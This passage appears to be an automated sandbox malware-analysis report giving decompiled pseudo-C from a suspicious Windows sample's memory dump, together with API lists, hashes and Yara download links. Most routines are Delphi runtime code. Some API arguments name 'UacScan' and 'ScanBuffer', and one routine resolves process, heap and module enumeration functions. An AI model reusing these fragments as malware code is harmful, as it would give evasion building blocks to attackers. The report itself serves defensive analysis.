							if( *0x28a6298 != 0) {
								 *0x28a6298(_v12, _t56, _a12,  &_a16); // executed
							}
						} else {
							_t47 = _t27 - 9;
							__eflags = _t47;
							if(_t47 == 0) {
								goto L12;
							} else {
								__eflags = _t47 == 4;
								if(_t47 == 4) {
									goto L12;
								} else {
									L14:
									_t41 = E02862E88(_t68,  &_v8);
									__eflags = _t41;
									if(_t41 == 0) {
										E0285DC7C(_t59);
									} else {
										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
									}
								}
							}
						}
					}
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x285e4db);
					__eflags = _v12;
					if(_v12 != 0) {
						E0285E7F0(_a4, _v12);
						return E0285E3C4( &_v28);
					}
					return 0;
				} else {
					_t54 = E0285E3E0(_a4, _t56[4], _a12, _a16);
					return _t54;
				}
			}

0x0285e3e1
0x0285e3e3
0x0285e3e8
0x0285e3f0
0x0285e40f
0x0285e413
0x0285e41f
0x0285e420
0x0285e428
0x0285e415
0x0285e417
0x0285e417
0x0285e42d
0x0285e42e
0x0285e433
0x0285e436
0x0285e439
0x0285e43c
0x0285e43f
0x0285e444
0x0285e454
0x0285e454
0x0285e459
0x00000000
0x0285e45b
0x0285e45b
0x0285e45e
0x00000000
0x00000000
0x00000000
0x00000000
0x0285e45e
0x0285e446
0x0285e446
0x0285e460
0x0285e460
0x0285e467
0x0285e476
0x0285e47c
0x0285e448
0x0285e448
0x0285e448
0x0285e44b
0x00000000
0x0285e44d
0x0285e44d
0x0285e450
0x00000000
0x0285e452
0x0285e481
0x0285e486
0x0285e48b
0x0285e48d
0x0285e4a6
0x0285e48f
0x0285e4a1
0x0285e4a1
0x0285e48d
0x0285e450
0x0285e44b
0x0285e446
0x0285e4ad
0x0285e4b0
0x0285e4b3
0x0285e4b8
0x0285e4bc
0x0285e4c6
0x00000000
0x0285e4ce
0x0285e4d3
0x0285e3f2
0x0285e402
0x0285e4e0
0x0285e4e0

APIs

VariantInit.OLEAUT32(?), ref: 0285E420

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 7a0bf3e4d656498c22b58117816924750e002fb80d136bc9df7251357bfe86a0
Instruction ID: d404897d7234a27115808495495cc6dfef4a740c9bec64ca5852824b605f8c0e
Opcode Fuzzy Hash: 7a0bf3e4d656498c22b58117816924750e002fb80d136bc9df7251357bfe86a0
Instruction Fuzzy Hash: 82314F7DA00628EBDB20DF9CCD84AAA77A9EB0C314F4484A1ED09D7240D734EB50CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02866D64 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E02866D64(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push(0x2866db1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E02854DA4( &_v8, __eax);
				_push(E02854DB4(_v8)); // executed
				L0285CDAC(); // executed
				E02866D54(_t9);
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(0x2866db8);
				return E02854C24( &_v8);
			}

0x02866d67
0x02866d71
0x02866d72
0x02866d77
0x02866d7a
0x02866d83
0x02866d90
0x02866d91
0x02866d96
0x02866d9d
0x02866da0
0x02866da3
0x02866db0

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02866DB1,?,?,?,00000000), ref: 02866D91

Part of subcall function 02854C24: SysFreeString.OLEAUT32(0286C78C), ref: 02854C32

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 201da4dbccaf64a4f1a79e1bcf74a3b5f28f851d7132f061d1d4129778aac0ab
Instruction ID: 2d615c65336c75673c81ce5a388a728ad5de3a35f7b29550b195d0b6dd04887a
Opcode Fuzzy Hash: 201da4dbccaf64a4f1a79e1bcf74a3b5f28f851d7132f061d1d4129778aac0ab
Instruction Fuzzy Hash: 62E0657D604268BFE701EBAACC519A977EEDF89710B5104B1EC00D2610EA797D049865

Uniqueness

Uniqueness Score: -1.00%

Function 0285582C Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0285582C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				CHAR* _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x2850000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E02855A90(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x2850000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x2850000
				return  *_t7;
			}

0x02855834
0x0285583a
0x02855846
0x0285584a
0x02855853
0x02855858
0x0285585a
0x0285585f
0x02855861
0x02855864
0x02855864
0x0285585f
0x02855867
0x02855872

APIs

GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 0285584A

Part of subcall function 02855A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02850000,02877790), ref: 02855AAC
Part of subcall function 02855A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855ACA
Part of subcall function 02855A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855AE8
Part of subcall function 02855A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02855B06
Part of subcall function 02855A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02855B4F
Part of subcall function 02855A90: RegQueryValueExA.ADVAPI32(?,02855CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001), ref: 02855B6D
Part of subcall function 02855A90: RegCloseKey.ADVAPI32(?,02855B9C,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02855B8F

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
Instruction ID: b651aa9ee7a7fba482d1908b06dfe2938727a23bd21a2d142f365f95aee88a94
Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
Instruction Fuzzy Hash: 23E06D79A002248BCB10DE5C88C0B5733D8AB08754F8409A1EC68CF246D374D9208BD1

Uniqueness

Uniqueness Score: -1.00%

Function 0285C348 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0285C348(struct HINSTANCE__* __eax, void* __edx) {
				char _v272;
				long _t4;
				void* _t11;
				void* _t12;
				void* _t13;

				_t11 = __edx;
				_t4 = GetModuleFileNameA(__eax,  &_v272, 0x105); // executed
				return E02854590(_t11, _t4, _t12, _t13);
			}

0x0285c350
0x0285c35f
0x0285c377

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,028A65D4,0286CE01,ScanString,02874C4C,ScanString,02874C4C,ScanBuffer,02874C4C,UacInitialize,02874C4C,UacScan,02874C4C), ref: 0285C35F

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 7f347b7f449ef46407a4c85a82607c806235aba9dcff474c9952b2882a4d2a65
Instruction ID: e63ab04a38cf87b483496e3e5f74a6ef779fd7153af62e5d81a53d71ff86c7e0
Opcode Fuzzy Hash: 7f347b7f449ef46407a4c85a82607c806235aba9dcff474c9952b2882a4d2a65
Instruction Fuzzy Hash: 6CD0A9AAB006342BE300A16C2C818AB32CE8B88B20F4000217998CA282FA608E4006D2

Uniqueness

Uniqueness Score: -1.00%

Function 02857E40 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02857E40(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02854964(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x02857e4b
0x02857e53
0x02857e5c
0x02857e5d
0x02857e60
0x02857e60

APIs

GetFileAttributesA.KERNEL32(00000000,028A65D4,0286CCD6,ScanString,02874C4C,ScanBuffer,02874C4C,UacInitialize,02874C4C,UacScan,02874C4C,ScanBuffer,02874C4C,Initialize,02874C4C,ScanString), ref: 02857E4B

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6032bb1559ed98a823780ea3a35b29ef58dfb1711ecd749b6dc01cbc9f0c2bd6
Instruction ID: 4b5374d15609cd3a4a6e59c0c07eafa7959fe7030db19a9f6c0175adbb776bef
Opcode Fuzzy Hash: 6032bb1559ed98a823780ea3a35b29ef58dfb1711ecd749b6dc01cbc9f0c2bd6
Instruction Fuzzy Hash: 96C08CEC2023310A1A90A6FC1CC816D42C8094593E3A44F21AC3CDA2E2E32198623821

Uniqueness

Uniqueness Score: -1.00%

Function 02857E64 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02857E64(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E02854964(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x02857e6f
0x02857e77
0x02857e80
0x02857e81
0x02857e84
0x02857e84

APIs

GetFileAttributesA.KERNEL32(00000000,028A65D4,0286F486,ScanString,02874C4C,OpenSession,02874C4C,ScanBuffer,02874C4C,OpenSession,02874C4C,ScanString,02874C4C,Initialize,02874C4C,ScanBuffer), ref: 02857E6F

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5ede7f27496aa7d05a39d7995107ce743fb0df7d598429dc5f5bb2cbfc69981a
Instruction ID: 824c9f66fb193fe62ad56c89e3b94cf3937865022fd78535d3c41af370bd8931
Opcode Fuzzy Hash: 5ede7f27496aa7d05a39d7995107ce743fb0df7d598429dc5f5bb2cbfc69981a
Instruction Fuzzy Hash: D7C08CACA223300A2E90A5FC0CC051942C80A4413D7A01F25EC2DD61E2E32288963921

Uniqueness

Uniqueness Score: -1.00%

Function 02854C3C Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E02854C3C(intOrPtr* __eax, void* __edx) {
				intOrPtr _t2;
				intOrPtr* _t3;
				void* _t5;

				_t3 = __eax;
				_t5 = __edx;
				do {
					_t2 =  *_t3;
					if(_t2 != 0) {
						 *_t3 = 0;
						_push(_t2); // executed
						L02851260(); // executed
					}
					_t3 = _t3 + 4;
					_t5 = _t5 - 1;
				} while (_t5 != 0);
				return _t2;
			}

0x02854c3e
0x02854c40
0x02854c42
0x02854c42
0x02854c46
0x02854c48
0x02854c4e
0x02854c4f
0x02854c4f
0x02854c54
0x02854c57
0x02854c57
0x02854c5c

APIs

SysFreeString.OLEAUT32 ref: 02854C4F

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
Instruction ID: 224d1f1f229b3dbee71f46efaaf29df283a06c6050f86108bd35eb3e75922115
Opcode Fuzzy Hash: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
Instruction Fuzzy Hash: 21C012AD60023047FF259A5C9CC075562CC9B45296B1400A1D91DD7240E7709C409665

Uniqueness

Uniqueness Score: -1.00%

Function 0287552C Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0287552C(int __eax) {
				int _t3;

				_t3 = timeSetEvent(__eax, 0, E02875520, 0, 1); // executed
				 *0x28a65bc = _t3;
				return _t3;
			}

0x0287553c
0x02875541
0x02875547

APIs

timeSetEvent.WINMM(00002710,00000000,02875520,00000000,00000001), ref: 0287553C

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 32a907206b6775765bf07dd8304d6edc9ce18e0d1988118040c363a0d3073f3e
Instruction ID: 04a022dda863c01333f1b6573897a466b9c8e028f440dd662778b704ca1f8561
Opcode Fuzzy Hash: 32a907206b6775765bf07dd8304d6edc9ce18e0d1988118040c363a0d3073f3e
Instruction Fuzzy Hash: 93C092FC7C63103AFA105AA91CC2F2B558ED709B01F940416BB04EE2D5F6E6A8500F69

Uniqueness

Uniqueness Score: -1.00%

Function 02854BFC Relevance: 1.5, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E02854BFC(signed int __eax) {
				signed int _t3;
				signed int _t12;
				void* _t14;
				void* _t18;

				_t3 = __eax;
				if(__eax == 0) {
					L11:
					return _t3;
				} else {
					_push(__eax);
					_push(0); // executed
					L02851250(); // executed
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t18 = _t14;
						_t12 = _t3 & 0x0000007f;
						if( *0x28a3008 != 0) {
							 *0x28a3008();
						}
						if(_t12 != 0) {
							if(_t12 <= 0x18) {
								_t2 = (_t12 & 0x000000ff) + 0x2877738; // 0xd7c9c8cc
								_t12 =  *_t2 & 0x000000ff;
							}
						} else {
							_t12 =  *(E028564E4() + 4);
						}
						return E02852CE8(_t18);
					} else {
						goto L11;
					}
				}
			}

0x02854bfc
0x02854bfe
0x02854c10
0x02854c10
0x02854c00
0x02854c00
0x02854c01
0x02854c03
0x02854c0a
0x02852d40
0x02852d43
0x02852cf6
0x02852cfa
0x02852d04
0x02852d0a
0x02852d0a
0x02852d12
0x02852d24
0x02852d29
0x02852d29
0x02852d29
0x02852d14
0x02852d19
0x02852d19
0x02852d3c
0x00000000
0x00000000
0x00000000
0x02854c0a

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02854C03

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
Instruction ID: bdfc5bbdde123e1d484f33dbbe3b3312b6510ca52da0c07fa89c0e6ef6123dfa
Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
Instruction Fuzzy Hash: 20B0123C20823528FB5419620E00732004C4BD02CAF8810519E1DCC0C0FF41D481983B

Uniqueness

Uniqueness Score: -1.00%

Function 02854C14 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E02854C14(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _t4;

				_t4 =  *__eax;
				 *__eax = __edx;
				if(_t4 != 0) {
					_push(_t4); // executed
					L02851260(); // executed
					return __eax;
				}
				return __eax;
			}

0x02854c14
0x02854c14
0x02854c18
0x02854c1a
0x02854c1b
0x00000000
0x02854c1b
0x02854c20

APIs

SysFreeString.OLEAUT32(00000000), ref: 02854C1B

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
Instruction ID: 5036d53801fa56726ad7c168d5e799cb6fd09a7b6ba9387552a660a9bcc0b728
Opcode Fuzzy Hash: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
Instruction Fuzzy Hash: D2A022BC0083330AAF0B2B2E000032E2033BFC03023C8C8E88E08CA0008F3A8800AC3A

Uniqueness

Uniqueness Score: -1.00%

Function 028515CC Relevance: 1.3, APIs: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E028515CC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void* _t10;
				void** _t15;
				void* _t17;

				_t8 = __eax;
				E02851560(__eax);
				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x28a3720 = 0;
					return 0;
				} else {
					_t15 =  *0x28a370c; // 0x3fd0000
					_t10 = _t4;
					 *_t10 = 0x28a3708;
					 *0x28a370c = _t4;
					 *(_t10 + 4) = _t15;
					 *_t15 = _t4;
					_t17 = _t4 + 0x140000;
					 *((intOrPtr*)(_t17 - 4)) = 2;
					 *0x28a3720 = 0x13fff0 - _t8;
					_t7 = _t17 - _t8;
					 *0x28a371c = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

0x028515cd
0x028515cf
0x028515e2
0x028515e9
0x0285163a
0x02851642
0x028515eb
0x028515eb
0x028515f1
0x028515f3
0x028515f9
0x028515fe
0x02851601
0x02851605
0x02851610
0x0285161d
0x02851625
0x02851627
0x02851634
0x02851637
0x02851637

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02851A03), ref: 028515E2

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 10560bfc9dd4d0d94eb95085fd2f20160ef2c1abb397d975921ad1b76caa51bb
Instruction ID: b0bec7b24d1adb01424ba5c643ed71e575aacb175318d7db500b421619f7812c
Opcode Fuzzy Hash: 10560bfc9dd4d0d94eb95085fd2f20160ef2c1abb397d975921ad1b76caa51bb
Instruction Fuzzy Hash: C8F06DF8B413005FEB05CFB99944311BBD2E78A344F1085B9D609EB3D8EB7584018B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02867D08 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02867D08() {

				if( *0x28a6350 == 0) {
					 *0x28a6350 = GetModuleHandleA("kernel32.dll");
					if( *0x28a6350 != 0) {
						 *0x28a6354 = GetProcAddress( *0x28a6350, "CreateToolhelp32Snapshot");
						 *0x28a6358 = GetProcAddress( *0x28a6350, "Heap32ListFirst");
						 *0x28a635c = GetProcAddress( *0x28a6350, "Heap32ListNext");
						 *0x28a6360 = GetProcAddress( *0x28a6350, "Heap32First");
						 *0x28a6364 = GetProcAddress( *0x28a6350, "Heap32Next");
						 *0x28a6368 = GetProcAddress( *0x28a6350, "Toolhelp32ReadProcessMemory");
						 *0x28a636c = GetProcAddress( *0x28a6350, "Process32First");
						 *0x28a6370 = GetProcAddress( *0x28a6350, "Process32Next");
						 *0x28a6374 = GetProcAddress( *0x28a6350, "Process32FirstW");
						 *0x28a6378 = GetProcAddress( *0x28a6350, "Process32NextW");
						 *0x28a637c = GetProcAddress( *0x28a6350, "Thread32First");
						 *0x28a6380 = GetProcAddress( *0x28a6350, "Thread32Next");
						 *0x28a6384 = GetProcAddress( *0x28a6350, "Module32First");
						 *0x28a6388 = GetProcAddress( *0x28a6350, "Module32Next");
						 *0x28a638c = GetProcAddress( *0x28a6350, "Module32FirstW");
						 *0x28a6390 = GetProcAddress( *0x28a6350, "Module32NextW");
					}
				}
				if( *0x28a6350 == 0 ||  *0x28a6354 == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x02867d11
0x02867d21
0x02867d26
0x02867d39
0x02867d4b
0x02867d5d
0x02867d6f
0x02867d81
0x02867d93
0x02867da5
0x02867db7
0x02867dc9
0x02867ddb
0x02867ded
0x02867dff
0x02867e11
0x02867e23
0x02867e35
0x02867e47
0x02867e47
0x02867d26
0x02867e4f
0x02867e5d
0x02867e5e
0x02867e61
0x02867e61

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02867F8F,?,?,02868021,00000000,028680FD), ref: 02867D1C
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02867D34
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02867D46
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02867D58
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02867D6A
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02867D7C
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02867D8E
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02867DA0
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02867DB2
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02867DC4
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02867DD6
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02867DE8
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02867DFA
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02867E0C
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02867E1E
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02867E30
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02867E42

Strings

Process32First, xrefs: 02867D98
Toolhelp32ReadProcessMemory, xrefs: 02867D86
Process32NextW, xrefs: 02867DCE
CreateToolhelp32Snapshot, xrefs: 02867D2C
Heap32ListNext, xrefs: 02867D50
kernel32.dll, xrefs: 02867D17
Process32FirstW, xrefs: 02867DBC
Heap32ListFirst, xrefs: 02867D3E
Heap32First, xrefs: 02867D62
Process32Next, xrefs: 02867DAA
Module32NextW, xrefs: 02867E3A
Module32FirstW, xrefs: 02867E28
Thread32Next, xrefs: 02867DF2
Heap32Next, xrefs: 02867D74
Thread32First, xrefs: 02867DE0
Module32First, xrefs: 02867E04
Module32Next, xrefs: 02867E16

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: AddressProc$HandleModule
